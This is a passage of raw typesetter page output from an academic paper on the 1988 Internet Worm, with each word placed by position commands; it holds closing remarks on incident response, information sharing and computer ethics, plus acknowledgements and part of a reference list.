2751(and)S
2931(other)S
3172(Internet)S
3518(communities)S
4071(may)S
4279(not)S
4443(be)S
4573(referable)S
4962(to)S
6576 V
720(the)S
874(CERT.)S
1217(I)S
1282(was)S
1470(told)S
1659(it)S
1748(is)S
1848(the)S
2003(hope)S
2230(of)S
2346(CERT)S
2635(personnel)S
3056(that)S
3239(these)S
3477(other)S
3715(networks)S
4114(will)S
4303(develop)S
4652(their)S
4868(own)S
6696 V
720(CERT-like)S
1195(groups.)S
1558(This,)S
1797(of)S
1916(course,)S
2237(may)S
2445(make)S
2697(it)S
2789(di)S
2867 H
	(f)show 10 -.5 mul h (\256)show
10 R
2951(cult)S
3136(to)S
3249(coordinate)S
3705(e)S
3749 H
	(f)show 10 -.5 mul h (f)show
10 R
3810(ective)S
4083(action)S
4362(and)S
4541(communica-)S
6816 V
720(tion)S
906(during)S
1197(the)S
1349(next)S
1551(threat.)S
1863(It)S
1954(may)S
2156(even)S
2374(introduce)S
2781(rivalry)S
3078(in)S
3187(the)S
3340(development)S
3887(and)S
4062(dissemination)S
4649(of)S
4763(critical)S
6936 V
720(information.)S
1278(The)S
1464(e)S
1508 H
	(f)show 10 -.5 mul h (f)show
10 R
1569(ectiveness)S
2010(of)S
2124(this)S
2300(organization)S
2830(against)S
3144(the)S
3297(next)S
3500(Internet-wide)S
4067(crisis)S
4308(will)S
4494(be)S
4618(interesting)S
7036 V
8 Y1
720(333333333333333333)S
7154 V
8 R
820(*)S
900(Personal)S
1198(communication,)S
1737(M.)S
1852(Poepping)S
2178(of)S
2268(the)S
2389(CERT.)S
7920 V
EP
%%Page: 16 17
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2767(- 16 -)S
840 V
720(to)S
828(note.)S
1080 V
10 B
720(6.)S
855(Concluding)S
1381(Remarks)S
1236 V
10 R
970(Not)S
1155(all)S
1320(the)S
1477(consequences)S
2060(of)S
2178(the)S
2335(Internet)S
2680(Worm)S
2970(incident)S
3327(are)S
3483(yet)S
3640(known;)S
3976(they)S
4184(may)S
4392(never)S
4649(be.)S
4834(Most)S
1356 V
720(likely)S
984(there)S
1219(will)S
1411(be)S
1541(changes)S
1898(in)S
2012(security)S
2364(consciousness)S
2966(for)S
3118(at)S
3226(least)S
3445(a)S
3525(short)S
3761(while.)S
4074(There)S
4342(may)S
4549(also)S
4745(be)S
4874(new)S
1476 V
720(laws,)S
965(and)S
1146(new)S
1349(regulations)S
1830(from)S
2061(the)S
2220(agencies)S
2600(governing)S
3042(access)S
3333(to)S
3449(the)S
3609(Internet.)S
4012(Vendors)S
4388(may)S
4598(change)S
4918(the)S
1596 V
720(way)S
927(they)S
1140(test)S
1320(and)S
1504(market)S
1821(their)S
2044(products\320and)S
2672(not)S
2840(all)S
2980(the)S
3142(possible)S
3510(changes)S
3871(may)S
4083(be)S
4217(advantageous)S
4800(to)S
4918(the)S
1716 V
720(end-user)S
1098(\(e.g.,)S
1335(removing)S
1753(the)S
1910(machine/host)S
2478(equivalence)S
2989(feature)S
3301(for)S
3453(remote)S
3766(execution\).)S
4278(Users')S
4574(interactions)S
1836 V
720(with)S
931(their)S
1147(systems)S
1497(may)S
1702(change)S
2017(based)S
2277(on)S
2410(a)S
2487(heightened)S
2958(awareness)S
3400(of)S
3516(security)S
3865(risks.)S
4142(It)S
4236(is)S
4336(also)S
4530(possible)S
4890(that)S
1956 V
720(no)S
859(signi\256cant)S
1315(change)S
1637(will)S
1833(occur)S
2094(anywhere.)S
2576(The)S
2771(\256nal)S
2989(bene\256t)S
3301(or)S
3424(harm)S
3669(of)S
3792(the)S
3954(incident)S
4316(will)S
4512(only)S
4730(become)S
2076 V
720(clear)S
943(with)S
1151(the)S
1303(passage)S
1643(of)S
1756(time.)S
2232 V
970(It)S
1067(is)S
1170(important)S
1595(to)S
1709(note)S
1917(that)S
2103(the)S
2261(nature)S
2546(of)S
2665(both)S
2879(the)S
3037(Internet)S
3383(and)S
3563(U)S
8 R
3635(NIX)S
10 R
3813(helped)S
4115(to)S
4229(defeat)S
4508(the)S
4666(Worm)S
4957(as)S
2352 V
720(well)S
936(as)S
1063(spread)S
1367(it.)S
1522(The)S
1721(immediacy)S
2209(of)S
2336(communication,)S
3026(the)S
3191(ability)S
3490(to)S
3611(copy)S
3848(source)S
4151(and)S
4338(binary)S
4636(\256les)S
4846(from)S
2472 V
720(machine)S
1107(to)S
1234(machine,)S
1646(and)S
1839(the)S
2010(widespread)S
2513(availability)S
3012(of)S
3144(both)S
3372(source)S
3682(and)S
3876(expertise)S
4286(allowed)S
4652(personnel)S
2592 V
720(throughout)S
1192(the)S
1347(country)S
1685(to)S
1795(work)S
2032(together)S
2391(to)S
2501(solve)S
2744(the)S
2898(infection,)S
3310(even)S
3530(despite)S
3845(the)S
3999(widespread)S
4485(disconnection)S
2712 V
720(of)S
834(parts)S
1059(of)S
1173(the)S
1326(network.)S
1709(Although)S
2118(the)S
2271(immediate)S
2724(reaction)S
3076(of)S
3190(some)S
3432(people)S
3730(might)S
3996(be)S
4122(to)S
4232(restrict)S
4541(communica-)S
2832 V
720(tion)S
921(or)S
1049(promote)S
1427(a)S
1516(diversity)S
1911(of)S
2039(incompatible)S
2606(software)S
2994(options)S
3334(to)S
3457(prevent)S
3800(a)S
3888(recurrence)S
4351(of)S
4478(a)S
4566(Worm,)S
4890(that)S
2952 V
720(would)S
1012(be)S
1148(an)S
1284(inappropriate)S
1858(reaction.)S
2276(Increasing)S
2733(the)S
2897(obstacles)S
3305(to)S
3425(open)S
3661(communication)S
4325(or)S
4450(decreasing)S
4918(the)S
3072 V
720(number)S
1057(of)S
1172(people)S
1470(with)S
1680(access)S
1966(to)S
2075(in-depth)S
2439(information)S
2942(will)S
3129(not)S
3288(prevent)S
3618(a)S
3693(determined)S
4173(attacker\320it)S
4675(will)S
4862(only)S
3192 V
720(decrease)S
1101(the)S
1262(pool)S
1479(of)S
1601(expertise)S
2000(and)S
2183(resources)S
2598(available)S
2997(to)S
3114(\256ght)S
3337(such)S
3559(an)S
3692(attack.)S
4024(Further,)S
4383(such)S
4606(an)S
4740(attitude)S
3312 V
720(would)S
1009(be)S
1142(contrary)S
1513(to)S
1630(the)S
1791(whole)S
2074(purpose)S
2429(of)S
2551(having)S
2861(an)S
2993(open,)S
3250(research-oriented)S
3979(network.)S
4399(The)S
4592(Worm)S
4885(was)S
3432 V
720(caused)S
1025(by)S
1159(a)S
1237(breakdown)S
1715(of)S
1833(ethics)S
2101(as)S
2219(well)S
2426(as)S
2544(lapses)S
2823(in)S
2936(security\320a)S
3431(purely)S
3721(technological)S
4294(attempt)S
4629(at)S
4736(preven-)S
3552 V
720(tion)S
906(will)S
1092(not)S
1250(address)S
1579(the)S
1731(full)S
1900(problem,)S
2288(and)S
2462(may)S
2664(just)S
2839(cause)S
3090(new)S
3286(di)S
3364 H
	(f)show 10 -.5 mul h (\256)show
10 R
3448(culties.)S
3708 V
970(What)S
1227(we)S
1384(learn)S
1624(from)S
1859(this)S
2045(about)S
2308(securing)S
2687(our)S
2862(systems)S
3221(will)S
3419(help)S
3633(determine)S
4074(if)S
4177(this)S
4364(is)S
4473(the)S
4637(only)S
4857(such)S
3828 V
720(incident)S
1079(we)S
1232(ever)S
1439(need)S
1663(to)S
1777(analyze.)S
2172(This)S
2386(attack)S
2660(should)S
2963(also)S
3160(point)S
3402(out)S
3566(that)S
3752(we)S
3904(need)S
4128(a)S
4208(better)S
4471(mechanism)S
4962(in)S
3948 V
720(place)S
980(to)S
1108(coordinate)S
1579(information)S
2101(about)S
2374(security)S
2741(\257aws)S
3003(and)S
3198(attacks.)S
3581(The)S
3787(response)S
4187(to)S
4316(this)S
4512(incident)S
4885(was)S
4068 V
720(largely)S
1029(ad)S
1155(hoc,)S
1356(and)S
1532(resulted)S
1880(in)S
1990(both)S
2200(duplication)S
2682(of)S
2797(e)S
2841 H
	(f)show 10 -.5 mul h (f)show
10 R
2902(ort)S
3045(and)S
3221(a)S
3296(failure)S
3587(to)S
3696(disseminate)S
4199(valuable)S
4568(information)S
4188 V
720(to)S
835(sites)S
1050(that)S
1237(needed)S
1556(it.)S
1705(Many)S
1976(site)S
2153(administrators)S
2763(discovered)S
3233(the)S
3393(problem)S
3764(from)S
3996(reading)S
4333(the)S
4493(newspaper)S
4957(or)S
4308 V
720(watching)S
1124(the)S
1284(television.)S
1766(The)S
1959(major)S
2230(sources)S
2567(of)S
2688(information)S
3198(for)S
3351(many)S
3610(of)S
3730(the)S
3889(sites)S
4104(a)S
4148 H
	(f)show 10 -.5 mul h (f)show
10 R
4209(ected)S
4456(seems)S
4737(to)S
4852(have)S
4428 V
720(been)S
965(Usenet)S
1299(news)S
1561(groups)S
1890(and)S
2091(a)S
2192(mailing)S
2555(list)S
2735(I)S
2825(put)S
3010(together)S
3394(when)S
3667(the)S
3846(Worm)S
4158(was)S
4370(\256rst)S
4583(discovered.)S
4548 V
720(Although)S
1131(useful,)S
1433(these)S
1671(methods)S
2043(did)S
2204(not)S
2365(ensure)S
2658(timely,)S
2971(widespread)S
3457(dissemination)S
4045(of)S
4160(useful)S
4436(information)S
4940(\320)S
4668 V
720(especially)S
1159(since)S
1405(many)S
1668(of)S
1792(them)S
2033(depended)S
2456(on)S
2597(the)S
2760(Internet)S
3111(to)S
3230(work!)S
3539(Over)S
3779(three)S
4019(weeks)S
4309(after)S
4532(this)S
4718(incident)S
4788 V
720(some)S
963(sites)S
1173(were)S
1398(still)S
1581(not)S
1741(reconnected)S
2254(to)S
2364(the)S
2518(Internet)S
2859(because)S
3205(of)S
3319(doubts)S
3617(about)S
3870(the)S
4023(security)S
4370(of)S
4484(their)S
4698(systems.)S
4908 V
720(The)S
914(Worm)S
1208(has)S
1380(shown)S
1680(us)S
1808(that)S
1997(we)S
2152(are)S
2312(all)S
2451(a)S
2495 H
	(f)show 10 -.5 mul h (f)show
10 R
2556(ected)S
2805(by)S
2944(events)S
3238(in)S
3355(our)S
3527(shared)S
3826(environment,)S
4395(and)S
4578(we)S
4734(need)S
4962(to)S
5028 V
720(develop)S
1084(better)S
1359(information)S
1878(methods)S
2264(outside)S
2600(the)S
2769(network)S
3143(before)S
3444(the)S
3613(next)S
3832(crisis.)S
4145(The)S
4347(formation)S
4788(of)S
4918(the)S
5148 V
720(CERT)S
1006(may)S
1208(be)S
1332(a)S
1406(step)S
1597(in)S
1705(the)S
1857(right)S
2076(direction,)S
2486(but)S
2644(a)S
2718(more)S
2953(general)S
3276(solution)S
3629(is)S
3726(still)S
3907(needed.)S
5304 V
970(Finally,)S
1311(this)S
1489(whole)S
1766(episode)S
2104(should)S
2404(cause)S
2658(us)S
2780(to)S
2891(think)S
3130(about)S
3385(the)S
3540(ethics)S
3806(and)S
3983(laws)S
4199(concerning)S
4675(access)S
4962(to)S
5424 V
720(computers.)S
1228(Since)S
1487(the)S
1646(technology)S
2127(we)S
2280(use)S
2450(has)S
2620(developed)S
3066(so)S
3191(quickly,)S
3552(it)S
3644(is)S
3747(not)S
3911(always)S
4224(simple)S
4527(to)S
4641(determine)S
5544 V
720(where)S
1008(the)S
1175(proper)S
1480(boundaries)S
1963(of)S
2092(moral)S
2371(action)S
2661(may)S
2879(be.)S
3074(Some)S
3348(senior)S
3638(computer)S
4061(professionals)S
4634(may)S
4852(have)S
5664 V
720(started)S
1021(their)S
1239(careers)S
1554(years)S
1798(ago)S
1976(by)S
2110(breaking)S
2493(into)S
2683(computer)S
3094(systems)S
3445(at)S
3551(their)S
3768(colleges)S
4129(and)S
4307(places)S
4590(of)S
4707(employ-)S
5784 V
720(ment)S
950(to)S
1058(demonstrate)S
1577(their)S
1791(expertise)S
2182(and)S
2357(knowledge)S
2826(of)S
2940(the)S
3093(inner)S
3329(workings)S
3732(of)S
3846(the)S
3999(systems.)S
4402(However,)S
4823(times)S
5904 V
720(have)S
940(changed)S
1304(and)S
1480(mastery)S
1828(of)S
1943(computer)S
2351(science)S
2675(and)S
2850(computer)S
3258(engineering)S
3760(now)S
3963(involves)S
4333(a)S
4408(great)S
4638(deal)S
4835(more)S
6024 V
720(than)S
929(can)S
1104(be)S
1235(shown)S
1533(by)S
1670(using)S
1924(intimate)S
2289(knowledge)S
2764(of)S
2884(the)S
3044(\257aws)S
3293(in)S
3409(a)S
3491(particular)S
3911(operating)S
4326(system.)S
4697(Whether)S
6144 V
720(such)S
938(actions)S
1256(were)S
1484(appropriate)S
1973(\256fteen)S
2263(years)S
2508(ago)S
2687(is,)S
2814(in)S
2927(some)S
3173(senses,)S
3488(unimportant.)S
4067(I)S
4135(believe)S
4458(it)S
4549(is)S
4651(critical)S
4962(to)S
6264 V
720(realize)S
1021(that)S
1207(such)S
1426(behavior)S
1811(is)S
1914(clearly)S
2221(inappropriate)S
2789(now.)S
3082(Entire)S
3362(businesses)S
3820(are)S
3978(now)S
4187(dependent,)S
4659(wisely)S
4957(or)S
6384 V
720(not,)S
911(on)S
1049(computer)S
1463(systems.)S
1872(People's)S
2253(money,)S
2587(careers,)S
2930(and)S
3111(possibly)S
3482(even)S
3707(their)S
3927(lives)S
4153(may)S
4362(be)S
4493(dependent)S
4940(on)S
6504 V
720(the)S
874(undisturbed)S
1378(functioning)S
1871(of)S
1986(computers.)S
2489(As)S
2632(a)S
2708(society,)S
3048(we)S
3196(cannot)S
3495(a)S
3539 H
	(f)show 10 -.5 mul h (f)show
10 R
3600(ord)S
3766(the)S
3921(consequences)S
4502(of)S
4618(condoning)S
6624 V
720(or)S
835(encouraging)S
1360(reckless)S
1713(or)S
1828(ill-considered)S
2409(behavior)S
2790(that)S
2972(threatens)S
3364(or)S
3479(damages)S
3860(computer)S
4268(systems,)S
4641(especially)S
6744 V
720(by)S
867(individuals)S
1360(who)S
1580(do)S
1728(not)S
1904(understand)S
2390(the)S
2560(consequences)S
3156(of)S
3287(their)S
3518(actions.)S
3904(As)S
4063(professionals,)S
4663(computer)S
6864 V
720(scientists)S
1127(and)S
1311(computer)S
1728(engineers)S
2150(cannot)S
2455(a)S
2499 H
	(f)show 10 -.5 mul h (f)show
10 R
2560(ord)S
2732(to)S
2849(tolerate)S
3187(the)S
3348(romanticization)S
4014(of)S
4136(computer)S
4552(vandals)S
4896(and)S
6984 V
720(computer)S
1140(criminals,)S
1580(and)S
1767(we)S
1926(must)S
2164(take)S
2373(the)S
2539(lead)S
2749(by)S
2893(setting)S
3204(proper)S
3508(examples.)S
3984(Let)S
4161(us)S
4294(hope)S
4532(there)S
4775(are)S
4940(no)S
7104 V
720(further)S
1021(incidents)S
1412(to)S
1520(underscore)S
1987(this)S
2162(particular)S
2574(lesson.)S
7920 V
EP
%%Page: 17 18
BP
/slant 0 def
/height 1.000000 def
10 R
10 R
480 V
2767(- 17 -)S
840 V
10 B
720(Acknowledgements)S
996 V
10 R
970(Early)S
1223(versions)S
1594(of)S
1715(this)S
1898(paper)S
2157(were)S
2388(carefully)S
2780(read)S
2989(and)S
3171(commented)S
3675(on)S
3813(by)S
3951(Keith)S
4211(Bostic,)S
4530(Steve)S
4790(Bello-)S
1116 V
720(vin,)S
903(Kathleen)S
1293(Heaphy,)S
1658(and)S
1832(Thomas)S
2184(Narten.)S
2540(I)S
2603(am)S
2755(grateful)S
3095(for)S
3241(their)S
3454(suggestions)S
3951(and)S
4125(criticisms.)S
1356 V
10 B
720(References)S
1548 V
10 R
720(1.)S
970(Participants,)S
10 I
1516(P)S
8 I
1577(ROCEEDINGS)S
10 I
2121(O)S
8 I
2193(F)S
10 I
2291(T)S
8 I
2347(HE)S
10 I
2503(V)S
8 I
2564(IRUS)S
10 I
2787(P)S
8 I
2848(OST)S
10 I
2991(-M)S
8 I
3107(ORTEM)S
10 I
3424(M)S
8 I
3507(EETING)S
10 R
3788(,)S
3863(National)S
4257(Computer)S
4707(Security)S
1668 V
970(Center,)S
1291(Ft.)S
1430(George)S
1753(Meade,)S
2079(MD,)S
2295(8)S
2375(November)S
2826(1988.)S
1824 V
720(2.)S
970(Sta)S
1098 H
	(f)show 10 -.5 mul h (f)show
10 R
1159(,)S
1214(``Uncle)S
1548(Sam's)S
1828(Anti-Virus)S
2291(Corps,'')S
10 I
2651(U)S
8 I
2723(NIX)S
10 I
2882(T)S
8 I
2938(ODAY)S
10 I
3148(!)S
10 R
3181(,)S
3236(p.)S
3341(10,)S
3496(Jan)S
3659(23,)S
3814(1989.)S
1980 V
720(3.)S
970(Allman,)S
1338(Eric,)S
10 I
1572(Sendmail\320An)S
2187(Internetwork)S
2746(Mail)S
2978(Router,)S
10 R
3319(University)S
3785(of)S
3912(California,)S
4386(Berkeley,)S
4815(1983.)S
2100 V
970(Issued)S
1255(with)S
1463(the)S
1615(BSD)S
1840(U)S
8 R
1912(NIX)S
10 R
2084(documentation)S
2708(set.)S
2256 V
720(4.)S
970(Bishop,)S
1315(Matt,)S
1565(``An)S
1789(Application)S
2297(of)S
2416(a)S
2496(Fast)S
2700(Data)S
2925(Encryption)S
3406(Standard)S
3798(Implementation,'')S
10 I
4559(C)S
8 I
4626(OMPUTING)S
2376 V
10 I
970(S)S
8 I
1020(YSTEMS)S
10 I
1305(:)S
1369(T)S
8 I
1425(HE)S
10 I
1563(J)S
8 I
1607(OURNAL)S
10 I
1951(O)S
8 I
2023(F)S
10 I
2103(T)S
8 I
2159(HE)S
10 I
2297(U)S
8 I
2369(SENIX)S
10 I
2618(A)S
8 I
2679(SSOCIATION)S
10 R
3129(,)S
3184(vol.)S
3367(1,)S
3472(no.)S
3627(3,)S
3732(pp.)S
3887(221-254,)S
4275(University)S
4727(of)S
4840(Cali-)S
2496 V
970(fornia)S
1238(Press,)S
1504(Summer)S
1873(1988.)S
2652 V
720(5.)S
970(Brunner,)S
1352(John,)S
10 I
1596(The)S
1776(Shockwave)S
2249(Rider,)S
10 R
2526(Harper)S
2832(&)S
2940(Row,)S
3184(1975.)S
2808 V
720(6.)S
970(Cohen,)S
1288(Fred,)S
1528(``Computer)S
2026(Viruses:)S
2391(Theory)S
2711(and)S
2887(Experiments,'')S
10 I
3515(P)S
8 I
3576(ROCEEDINGS)S
10 I
4103(O)S
8 I
4175(F)S
10 I
4256(T)S
8 I
4312(HE)S
10 I
4451(7T)S
8 I
4557(H)S
10 I
4647(N)S
8 I
4714(ATIONAL)S
2928 V
10 I
970(C)S
8 I
1037(OMPUTER)S
10 I
1441(S)S
8 I
1491(ECURITY)S
10 I
1847(C)S
8 I
1914(ONFERENCE)S
10 R
2379(,)S
2434(pp.)S
2589(240-263,)S
2977(1984.)S
3084 V
720(7.)S
970(Comer,)S
1301(Douglas)S
1668(E.,)S
10 I
1813(Internetworking)S
2492(with)S
2700(TCP/IP:)S
3074(Principles,)S
3545(Protocols)S
3969(and)S
4154(Architecture,)S
10 R
4713(Prentice)S
3204 V
970(Hall,)S
1197(Englewood)S
1682(Cli)S
1805 H
	(f)show 10 -.5 mul h (f)show
10 R
1866(s,)S
1960(NJ,)S
2126(1988.)S
3360 V
720(8.)S
970(Denning,)S
1369(Peter,)S
1629(``The)S
1880(Internet)S
2220(Worm,'')S
10 I
2596(A)S
8 I
2657(MERICAN)S
10 I
3034(S)S
8 I
3084(CIENTIST)S
10 R
3423(,)S
3478(vol.)S
3661(77,)S
3816(no.)S
3971(2,)S
4076(March-April)S
4610(1989.)S
3516 V
720(9.)S
970(Denning,)S
1390(Peter)S
1646(J.,)S
1786(``Computer)S
2303(Viruses,'')S
10 I
2750(A)S
8 I
2811(MERICAN)S
10 I
3209(S)S
8 I
3259(CIENTIST)S
10 R
3598(,)S
3674(vol.)S
3878(76,)S
4054(pp.)S
4231(236-238,)S
4641(May-June)S
3636 V
970(1988.)S
3792 V
720(10.)S
970(Eichin,)S
1286(Mark)S
1532(W.)S
1681(and)S
1855(Jon)S
2025(A.)S
2153(Rochlis,)S
2515(``With)S
2812(Microscope)S
3314(and)S
3489(Tweezers:)S
3929(An)S
4082(Analysis)S
4463(of)S
4577(the)S
4730(Internet)S
3912 V
970(Virus)S
1241(of)S
1373(November)S
1843(1988,'')S
10 I
2183(P)S
8 I
2244(ROCEEDINGS)S
10 I
2788(O)S
8 I
2860(F)S
10 I
2958(T)S
8 I
3014(HE)S
10 I
3170(S)S
8 I
3220(YMPOSIUM)S
10 I
3677(O)S
8 I
3749(N)S
10 I
3851(R)S
8 I
3912(ESEARCH)S
10 I
4308(I)S
8 I
4341(N)S
10 I
4443(S)S
8 I
4493(ECURITY)S
10 I
4867(A)S
8 I
4928(ND)S
4032 V
10 I
970(P)S
8 I
1031(RIVACY)S
10 R
1303(,)S
1358(IEEE-CS,)S
1785(Oakland,)S
2178(CA,)S
2372(May)S
2585(1989.)S
4188 V
720(11.)S
970(Eisenberg,)S
1424(Ted,)S
1634(David)S
1908(Gries,)S
2179(Juris)S
2398(Hartmanis,)S
2869(Dan)S
3066(Holcomb,)S
3494(M.)S
3639(Stuart)S
3909(Lynn,)S
4176(and)S
4351(Thomas)S
4704(Santoro,)S
4308 V
10 I
970(The)S
1150(Computer)S
1580(Worm,)S
10 R
1879(O)S
1951 H
	(f)show 10 -.5 mul h (\256)show
10 R
2035(ce)S
2153(of)S
2266(the)S
2418(Provost,)S
2779(Cornell)S
3109(University,)S
3586(Ithaca,)S
3884(NY,)S
4083(Feb.)S
4288(1989.)S
4464 V
720(12.)S
970(Gerrold,)S
1335(David,)S
10 I
1634(When)S
1891(Harlie)S
2182(Was)S
2384(One,)S
10 R
2605(Ballentine)S
3046(Books,)S
3357(1972.)S
3642(The)S
10 B
3827(\256rst)S
10 R
4029(edition.)S
4620 V
720(13.)S
970(Grampp,)S
1355(Fred.)S
1596(T.)S
1716(and)S
1894(Robert)S
2200(H.)S
2331(Morris,)S
2662(``U)S
8 R
2800(NIX)S
10 R
2976(Operating)S
3409(System)S
3738(Security,'')S
10 I
4196(A)S
8 I
4257(T)S
10 I
4302(&T)S
4470(B)S
8 I
4531(ELL)S
10 I
4704(L)S
8 I
4760(ABORA-)S
4740 V
970(TORIES)S
10 I
1267(T)S
8 I
1323(ECHNICAL)S
10 I
1742(J)S
8 I
1786(OURNAL)S
10 R
2099(,)S
2154(vol.)S
2337(63,)S
2492(no.)S
2647(8,)S
2752(part)S
2937(2,)S
3042(pp.)S
3197(1649-1672,)S
3685(Oct.)S
3884(1984.)S
4896 V
720(14.)S
970(Harrenstien,)S
1490(K.,)S
1642(``Name/Finger,'')S
2356(R)S
8 R
2423(FC)S
10 R
2552(742,)S
2757(SRI)S
2943(Network)S
3322(Information)S
3829(Center,)S
4150(December)S
4589(1977.)S
5052 V
720(15.)S
970(Hinden,)S
1335(R.,)S
1498(J.)S
1608(Haverty,)S
2000(and)S
2190(A.)S
2333(Sheltzer,)S
2731(``The)S
2998(DARPA)S
3384(Internet:)S
3769(Interconnecting)S
4442(Heterogeneous)S
5172 V
970(Computer)S
1411(Networks)S
1840(with)S
2059(Gateways,'')S
10 I
2583(C)S
8 I
2650(OMPUTER)S
10 I
3064(M)S
8 I
3147(AGAZINE)S
10 R
3477(,)S
3542(vol.)S
3735(16,)S
3900(no.)S
4065(9,)S
4180(pp.)S
4345(38-48,)S
4643(IEEE-CS,)S
5292 V
970(September)S
1427(1983.)S
5448 V
720(16.)S
970(King,)S
1226(Kenneth)S
1595(M.,)S
1765(``Overreaction)S
2382(to)S
2492(External)S
2862(Attacks)S
3199(on)S
3331(Computer)S
3763(Systems)S
4129(Could)S
4406(be)S
4532(More)S
4780(Harm-)S
5568 V
970(ful)S
1131(than)S
1353(the)S
1525(Viruses)S
1880(Themselves,'')S
10 I
2498(C)S
8 I
2565(HRONICLE)S
10 I
3007(O)S
8 I
3079(F)S
10 I
3177(H)S
8 I
3249(IGHER)S
10 I
3538(E)S
8 I
3599(DUCATION)S
10 R
4001(,)S
4075(p.)S
4199(A36,)S
4445(November)S
4915(23,)S
5688 V
970(1988.)S
5844 V
720(17.)S
970(Kocher,)S
1320(Bryan,)S
1621(``A)S
1791(Hygiene)S
2161(Lesson,'')S
10 I
2567(C)S
8 I
2634(OMMUNICATIONS)S
10 I
3320(O)S
8 I
3392(F)S
10 I
3473(T)S
8 I
3529(HE)S
10 I
3668(A)S
8 I
3729(CM)S
10 R
3849(,)S
3906(vol.)S
4091(32,)S
4248(no.)S
4406(1,)S
4514(p.)S
4622(3,)S
4730(January)S
5964 V
970(1989.)S
6120 V
720(18.)S
970(Markho)S
1286 H
	(f)show 10 -.5 mul h (f)show
10 R
1347(,)S
1412(John,)S
1666(``Author)S
2055(of)S
2178(Computer)S
2618('Virus')S
2946(Is)S
3058(Son)S
3254(of)S
3377(U.)S
3514(S.)S
3635(Electronic)S
4086(Security)S
4460(Expert,'')S
10 I
4858(N)S
8 I
4925(EW)S
6240 V
10 I
970(Y)S
8 I
1026(ORK)S
10 I
1217(T)S
8 I
1273(IMES)S
10 R
1454(,)S
1509(p.)S
1614(A1,)S
1791(November)S
2242(5,)S
2347(1988.)S
6396 V
720(19.)S
970(Morris,)S
1307(Robert)S
1619(and)S
1803(Ken)S
2009(Thompson,)S
2502(``U)S
8 R
2640(NIX)S
10 R
2822(Password)S
3245(Security,'')S
10 I
3709(C)S
8 I
3776(OMMUNICATIONS)S
10 I
4470(O)S
8 I
4542(F)S
10 I
4631(T)S
8 I
4687(HE)S
10 I
4834(A)S
8 I
4895(CM)S
10 R
5015(,)S
6516 V
970(vol.)S
1153(22,)S
1308(no.)S
1463(11,)S
1618(pp.)S
1773(594-597,)S
2161(ACM,)S
2444(November)S
2895(1979.)S
6672 V
720(20.)S
970(Postel,)S
1274(Jonathan)S
1663(B.,)S
1814(``Simple)S
2198(Mail)S
2421(Transfer)S
2792(Protocol,'')S
3256(R)S
8 R
3323(FC)S
10 R
3456(821,)S
3665(SRI)S
3855(Network)S
4238(Information)S
4749(Center,)S
6792 V
970(August)S
1289(1982.)S
6948 V
720(21.)S
970(Reid,)S
1216(Brian,)S
1495(``Re\257ections)S
2043(on)S
2175(Some)S
2435(Recent)S
2744(Widespread)S
3253(Computer)S
3686(Breakins,'')S
10 I
4165(C)S
8 I
4232(OMMUNICATIONS)S
10 I
4919(O)S
8 I
4991(F)S
7068 V
10 I
970(T)S
8 I
1026(HE)S
10 I
1163(A)S
8 I
1224(CM)S
10 R
1344(,)S
1399(vol.)S
1582(30,)S
1737(no.)S
1892(2,)S
1997(pp.)S
2152(103-105,)S
2540(ACM,)S
2823(February)S
3213(1987.)S
7920 V
EP
%%Page: 18 19
BP
/slant 0 def
/height 1.000000 def
10 R
10 R
480 V
2767(- 18 -)S
840 V
720(22.)S
970(Ritchie,)S
1323(Dennis)S
1645(M.,)S
1823(``On)S
2050(the)S
2211(Security)S
2583(of)S
2705(U)S
8 R
2777(NIX)S
10 R
2919(,'')S
3049(in)S
10 I
3166(U)S
8 I
3238(NIX)S
10 I
3406(S)S
8 I
3456(UPPLEMENTARY)S
10 I
4102(D)S
8 I
4174(OCUMENTS)S
10 R
4598(,)S
4663(AT)S
4836(&)S
4954(T,)S
960 V
970(1979.)S
1116 V
720(23.)S
970(Royko,)S
1292(Mike,)S
1558(``Here's)S
1919(how)S
2121(to)S
2229(stop)S
2426(computer)S
2833(vandals,'')S
10 I
3259(T)S
8 I
3315(HE)S
10 I
3452(C)S
8 I
3519(HICAGO)S
10 I
3852(T)S
8 I
3908(RIBUNE)S
10 R
4193(,)S
4248(November)S
4699(7,)S
4804(1988.)S
1272 V
720(24.)S
970(Seeley,)S
1312(Donn,)S
1610(``A)S
1799(Tour)S
2044(of)S
2178(the)S
2352(Worm,'')S
10 I
2750(P)S
8 I
2811(ROCEEDINGS)S
10 I
3358(O)S
8 I
3430(F)S
10 I
3531(1989)S
3783(W)S
8 I
3866(INTER)S
10 I
4141(U)S
8 I
4213(SENIX)S
10 I
4483(C)S
8 I
4550(ONFERENCE)S
10 R
5015(,)S
1392 V
970(Usenix)S
1283(Association,)S
1810(San)S
1990(Diego,)S
2289(CA,)S
2483(February)S
2873(1989.)S
1548 V
720(25.)S
970(Shoch,)S
1285(John)S
1514(F.)S
1635(and)S
1819(Jon)S
1998(A.)S
2135(Hupp,)S
2422(``The)S
2683(Worm)S
2978(Programs)S
3401(\320)S
3541(Early)S
3797(Experience)S
4286(with)S
4505(a)S
4590(Distributed)S
1668 V
970(Computation,'')S
10 I
1614(C)S
8 I
1681(OMMUNICATIONS)S
10 I
2365(O)S
8 I
2437(F)S
10 I
2516(T)S
8 I
2572(HE)S
10 I
2709(A)S
8 I
2770(CM)S
10 R
2890(,)S
2945(vol.)S
3128(25,)S
3283(no.)S
3438(3,)S
3543(pp.)S
3698(172-180,)S
4086(ACM,)S
4369(March)S
4659(1982.)S
1824 V
720(26.)S
970(Spa)S
1120 H
	(f)show 10 -.5 mul h (f)show
10 R
1181(ord,)S
1382(Eugene)S
1724(H.,)S
1889(``The)S
2154(Internet)S
2508(Worm)S
2807(Program:)S
3223(An)S
3389(Analysis,'')S
10 I
3874(C)S
8 I
3941(OMPUTER)S
10 I
4359(C)S
8 I
4426(OMMUNICATION)S
1944 V
10 I
970(R)S
8 I
1031(EVIEW)S
10 R
1270(,)S
1331(vol.)S
1520(19,)S
1681(no.)S
1842(1,)S
1953(ACM)S
2217(SIGCOM,)S
2667(January)S
3013(1989.)S
3304(Also)S
3528(issued)S
3813(as)S
3931(Purdue)S
4249(CS)S
4407(technical)S
4802(report)S
2064 V
970(TR-CSD-823)S
2220 V
720(27.)S
970(Spa)S
1120 H
	(f)show 10 -.5 mul h (f)show
10 R
1181(ord,)S
1374(Eugene)S
1708(H.,)S
1865(``Some)S
2194(Musings)S
2574(on)S
2709(Ethics)S
2994(and)S
3173(Computer)S
3608(Break-Ins,'')S
10 I
4128(P)S
8 I
4189(ROCEEDINGS)S
10 I
4720(O)S
8 I
